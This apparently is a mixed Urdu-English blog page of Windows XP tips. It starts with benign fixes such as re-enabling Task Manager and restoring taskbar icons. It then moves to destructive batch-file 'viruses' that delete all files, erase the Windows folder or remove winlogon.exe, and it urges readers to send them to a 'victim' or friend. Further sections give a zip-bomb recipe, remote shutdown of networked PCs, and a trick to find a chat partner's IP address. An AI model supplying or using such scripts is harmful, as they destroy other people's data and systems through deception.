1) jub main koshis karta hon ke task manager  (Ctr+Alt+Del) open karun lekin open karne se yeh message aa jata hai.!

'task manger has been disabled by ur administrator'..., and also i cant access my registry too..!!

Hmare pas is ka hal hai....

kya yeh virus hai...????

main isey kese thek karun wo bhi window kiye baghair...?? kyaa koi khaas software hai is ka??

nahin just aik choti c trick ki jiye aNd Thek ki jiye.

1: Close the IE browser. Log out messenger / Remove Internet Cable.

2: To enable Regedit

Click Start, Run and type
this command exactly as given below: (better - Copy and paste)

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

3: To enable task manager : (To kill the process we need to enable task manager)

Click Start, Run and type this command exactly as given below: (better - Copy and paste)

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

4: Ab Ap ne internet Explorer ka page Change karna hai with regedit.

Start>Run>Regedit

From the below locations in Regedit chage your default home page to google.com or other.

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main

HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main

HKEY_USERS\Default\Software\Microsoft\Internet Explorer\Main

Just replace the attacker site with google.com or set it to blank page.

5: Now we need to kill the process from back end. Press Ctrl + Alt + Del

Kill the process svhost32.exe . ( may be more than one process is running.. check properly)

6: Delete svhost32.exe , svhost.exe files from Windows/ & temp/ directories. Or just search for svhost in your comp.. delete those files.

7: Go to regedit search for svhost and delete all the results you get.

Start menu > Run > Regedit >

8: Restart the computer. That’s it now you are virus free.



it works !!





** Shared from Internet (reva)







2)I don't have IIS( Internet Information Services) windows componet on my system



As far as I know one can't have IIS running on XP Home. I think u will have to upgrade it to XP Prof.

in proff That's simple get the Win XP CD, go to control panel-->add/remove programs and then to add/remove windows components. There u will find the option for adding IIS, just check the checkbox and follow the instructions. You r done!!



3) Folder Option Vanished


IF U WANT UR FILES THT WERE HIDDEN U CAN TYPE *.* IN SEARCH AND ALSO TICK THE OPTION "INCLUDE HIDDEN FILES".

NOW SEARCH IN THE DRIVE IN WHICH U STORED UR FILES, U WILL GET UR FILES BUT TO GET BACK THE OPTION U EITHER HAVE TO REINSTALL WINDOWS OR REPAIR IT. well this is as far as i know..


Post your Comment If you Know More


4) My volume icon is not showing in taskbar, Yet It's Enable From Control Panel > Sound And devices



Assuming that you have tried the basic steps i am directly trying with the most possible solutions. This issue most commmonly occurs because the settings are not saved. Also there might be some startup program which is diabling the Systray.exe from loading up.



Try this...

1) Re-enable the volume icon by disabling and then enabling Place volume icon in the taskbar in the Sound and Audio applet.

2) Then copy the following text which is in red into a notepad file and then save it as "fix.reg". Please make sure that there is no .txt extension after that.

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

"NoSaveSettings"=dword:00000000

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]

"SystemTray"="SysTray.Exe"



3) Merge the file to the registry by simply double clicking on it.

4) Reboot



This should definitely work. Please reply back with the status.



Cheers



:shared frm internet (bond)



5)Whenever i try d'loading stuff from the net, the download starts and the comp just restarts. due to dis i have to install d'load managers wich i hate. help needed anyone. i have win xp!


If the computer just restarts itself, it cud possibly be an application crash..

check the Dr.watson log for details..

START-RUN- drwtsn32.

check the path for the log here... open the log and check which application is causing the crash.

turn of automatic reboot,cos you wud miss it if there is a BSOD being generated.


or may be u could try this one out


Go to Start>Run--Type 'services.msc', hit ENTER

Scroll down to a service called Remote Procedure Call, right click, go to properties, there will be a tab named Recover Action, change it to 'Take No Action' if it's not already selected. Your problem should be solved for the time being. Also look for all network related srvices DNS, TCP-IP and also Windows Firewall/ICS service if you're on LAN/WAN, see that all of these are set to Automatic or Manual. Reply to me with results


(Resident , david n kumar)


6)I accidentally deleted the Show Desktop icon which sits normally on the bottom left hand corner of the Taskbar. How do I restore the icon?



Click Start, Run and type the following command:



regsvr32 /n /i:U shell32.dll



The Show Desktop icon file should be available now.





or



Click Start, Run, and type Notepad.exe. Copy the following contents to Notepad.



[Shell]

Command=2

IconFile=explorer.exe,3

[Taskbar]

Command=ToggleDesktop



Save the file as - : Show Desktop.scf. Now, drag the file to the Quick Launch Toolbar. (Notepad might automatically append a .txt extension to the file name. Remove this extension if present.)

Shared Document And Recycle Bin Ko ReMove Kar den.



1. Recyle Bin ko Desktop Se Remove Karen. Tip:


Click On START > RUN and type Regedit and hit enter. Then you should navigate to following entry in registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\

Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E} and delete it. This action should remove recycle bin from your desktop.

2: Shared Document Ko My Computer Se Remove Karen tip:

kuch Log Shared Document Ko Pasand Nahin Karte Or Chahte hain ke wo Shared Document Remove Kr Den.

START>RUN and enter regedit.
Once in registry, navigate to key HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ My Computer \ NameSpace \ DelegateFolders You must see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. If you delete this key, you have effectively removed the my shared documents folder.

Notepad Hacking...



NotePad Main Kuch aisi Wordin karenke jis se 1mb ka ote pad 1gb main change ho jaye ga as show how to make a simple 1k = 1m ratio.

1) Make a.txt file
2) Open and type the null character (alt + 255)
3) Press ctrl + a then ctrl + v a couple times to make some null bytes

4) If u have a hexeditor make the hex 00 for about 50 kilobytes.
5) Now make several copies of a.txt and name accordinly
6) Open cmd.exe
7) Type copy /b *.txt b.txt
8) Now every copy is made into a super copy and repeat
9) Once you have a nice empty big text file like 1gb. Put it in a zip archive.
Because of the simple construction of the file, 1gb of null bytes…..!
The zip is only 1 mb in size and can really annoy freinds.
For added fun hex edit the zip and you will see a bunch of hex 5555
Just add some more and the file will expand amazingly
Make sure to not open this after
You can always create your zip of death from the command line in linux
dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz

Yeh Virus Pc ko Restart Krta hai.

Open NotePad And Type/Paste this Code on Ur NotePad

@echo off shutdown -r -f -t 00

or is ko save as kar ke .bat main save kar den.for example restart.bat main ya any one kisi bi naam se save kar den per last main .bat aana chahiye.

Yeh Virus Window Ko Crush/Damage Kar deta hai.



open notepad and paste this code on your notepad

@Echo off
Del C:\ *.* y

ab isey save as kar ke .bat main save kar den. for example crush.bat main ya any one kisi bi naam se save kar den per last main .bat aana chahiye.

Yeh Virus Hard Disk ki tamam Files Delete kar deta hai.



open notepad and paste this code on your notepad

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Or Isey Save As kar ke .bat main save kar den.for example delete.bat main ya any one kisi bi naam se save kar den per last main .bat aana chahiye. ab yeh kisi ko send kar den ya kisi victom or friend ke pc main yeh files open karen jub hi yeh files on ho gi to Hard disk ki sari files delete ho jayen gi. 

Networking kiye huwe Computers ko Shutdown karen.

Hum Jante hain key shutdown ki pc ko off karne ke liye use hoti hai jesa ke shutdown -s (s) for shut down -r for restart -l for logof and if u want to shut down a pc on network use -s -m .. eg


is ko banane ke liye==>

1. Open Notepad,

2.Type Shutdown -s -m \\xxx.xxx.xxx.xxx (IP Address)

For exapmle -s -m //475.357.357.247 (in number ki jagah per us pc ka ip address likhen jis ko ap off karna chahte hain)

3. Save To Desktop As (Anything).bat (file ke last per .BAT lagana mat bholiye)

4.Double click on the icon and wait.

you can also open CMD and type "Shutdown -i"

Thats My 2nd Trick Thankyou..

Free Calls Karen without Any Sim..!



Free Calls Milayen from "Fring" this is a great application just download it from
www.fring.com and make free calls you can also do many things like Video calls text and much more

khud File bana kar Apne Cd Rom Ko Open And Close Karen..!!

The first code we are going to look at is one that makes the cd tray open and close repeatedly until shutdown, or


(you press ctrl + alt + delete and go to processes, and end wscript.exe (this code is vbs so save in note pad as whateveryouwant.vbs)

Set colCDROMs = oWMP.cdromCollection


if colCDROMs.Count >= 1 then


do


For i = 0 to colCDROMs.Count - 1


colCDROMs.Item(i).Eject


Next ' cdrom


For i = 0 to colCDROMs.Count - 1


colCDROMs.Item(i).Eject


Next ' cdrom


loop


end if

FaceBook Per Chatting Ke Words Impressive Banayen..!




For making the text Bold

    type your words between * *(two stars ) will automatically turns into bold.
    Example : You write
    Learn to *hack*
    will turns to
    Learn to hack

For underlined Text

    type between _ _(two underscores) will automatically turns into underlined text
    Example:

Learn Hacking  _rocks_ .
Turns to
Learn Hacking rocks.
For writing Bold+Underline

    Whatever you type between *_ _* will automatically turns into Bold+Underline
    Example:

You *_love_* hacking?
Turns to
You love hacking?

FaceBook per kisi person ka ip address kese maloom kiya ja sakta hai.?

yeh trick tabh istimal hoti hai jub aap kisi se chatting kr rahe hote hain or phir ap baghair kisi or se catting kiye huwe ya net per koi or kaam kiye bagair achanak se tamam websites , messengers jo ke ap use kar rahe hon wo sub close kar den. phir ap apni history , cookies delete kar den.ab ap dubara usi personse chatting karna shuru kar den.


ab aap start->run->cmd.exe open karen ab command promote main yeh command dalen.

netstat –an

and wait and watch the foreign address will be the IP address. (*_*) hmmmmm cooOoOL na.

Apne pentium 3 ya 4 Pc ko Pentium 5 ya us se zyada show karwayen.!

is trick se ap apne pentium ko barha sakte hain

AND also PROCESSOR

VALUE UPTO 3.0 HRTZ OR MORE THAN THIS

click on start START->RUN->TYPE REGEDIT

NOW CLICK IN

H-KEY-LOCAL-MACHIN . THEN ON HARDWARE. THEN ON DISCRIPTION.THEN ON SYSTEM,THEN ON

CentralProcessor.THEN ON 0

{H-KEY-LOCAL-MACHIN/HARDWARE/DISCRIPTION

/SYSTEM/CentralProcessor/0}

NOW U GET IN RIGHT PANE THE VALUE THAT IS

"ProcessorNameString"

DOUBLE CLICK ON THIS VALUE

VALUE NAME AND VALUE DATA IS NOW IN FROUNT OF U NOW IN DATA COLOM U CAN EDIT IT RANDOMLY WHAT U WANT IN PLACE OF THAT

VALUE

AND THEN PRESS OK


NOW SEE SYSTEM PROPERTY JUST RIGHT CLICKING IN U ARE MY COMPUTER ICON OR SEE SYSTEM PROPERTY JUST BY PRESSING {WIN+PAUSE BREAK }  (*_*) hmmmm . . .

Victom ke pc ko Destroy Karen Witn NotePad Virus.!

Sari files or folders ko delete karne ke liye note pad main yeh code paste karen:

DEL /F /Q *

ab ise save as kar ke .cmd main save karen as whateveryouwant.cmd

aGAR aaP Ka yeh khayal hai ke is virus ne kuc khaas asar nahin kiya to ap my second virus try karen.

WARNING!!! DO NOT CLICK ON IT WHEN YOU HAVE CREATED IT, IT WILL DESTROY YOUR COMPUTER

Agar ap just wondow ki files dlete karna chahte hain to is ko try karen:

1=> notepad ko open karen
2=> or isey apne notepad main paste kar den

erase C:WINDOWS

and save it again as whateveryouwant.cmd. Now DON'T run the file or you'll lose your WINDOWS files. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX files are gone. And have to install LINUX/WINDOWS again.

Simple explanation:

Go to notepad, type erase C:WINDOWS, save as whateveryouwant.cmd send to victim, once the victim opens it, the WINDOWS file will be gone and have to install WINDOWS again.

^^^^^^^^^^^^

iS Virus se Kisi Bhi Extension ki File ko Delete karen tamam Drives main se aik hi waqt main..!


Here i will tell you the batch commands by which you can delete any type of any extention file from full hdd eg: .exe .jpg .avi i am going to delete .eml file i dnt like this rubbish file in my pc
jst open notepad and type..

for %%x in (c d e f g h i ) do del /s  %%x:\*.eml
saveas eml killer.bat

is file ko ap as a anti virus bhi use kar sakte hain or for removing temporary files and also as a virus if you type *.exe it will delete all  exe files if you want to delete .exe and .inf then use this..

for %%x in (c d e f g h i j) do del /s %%x:\*.eml del /s *.inf
If you have more than 6..7 drives you can add (C D E F G H I J K L) ...
hope you like it...

victom/friend ki window corrupt kare with Btach Virus..!


1=> open notepad
2=> ye code copy karen or apne notepad main paste kar den.

@echo off
del c:\windows\system32\restore
del c:\windows\system32\winlogon.exe
del c:\windows\system32\logonui.exe
shutdown -f

3=> Or Isey Save As kar ke .bat main save kar den.for example corrupt.bat main ya any one kisi bi naam se save kar den per last main .bat aana chahiye.

Desktop ke Sare items Hide Karen.



yeh aik bilkul simple trick hai jis se ap apne desktop ke tamam icons hide kar sakte hain.


Just go to Start->run.Type regedit.

Go to HKEY_CURRENT_USER,then go to Software,then M*cro$oft,then to Windows,go to Current version,then policies and then click on explorer.


On the right hand side,right click and click on New.Then select DWORD value.
Rename this value as "NoDesktop" (without the quotes).Click on it and set its value to 1 in the value data space.Now restart your pc or just log off and log in back.

You will see that all your Desktop icons are gone.
To get back your icons,go to the DWORD value you created,now either delete it or set its value to 0.

In both cases you will get back all your icons.Try it out.  (*_*)

Pc Main Hidden Ki huwi Files Ko Second Main Dhondiye...!



1=> Search Bar main jayen.

2=> Type karen *.* and hit enter.

3=> ap ke computer ki hidden ki hui files second main aap ke samne aa jayen gi. (*_*)
___________________________________________

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More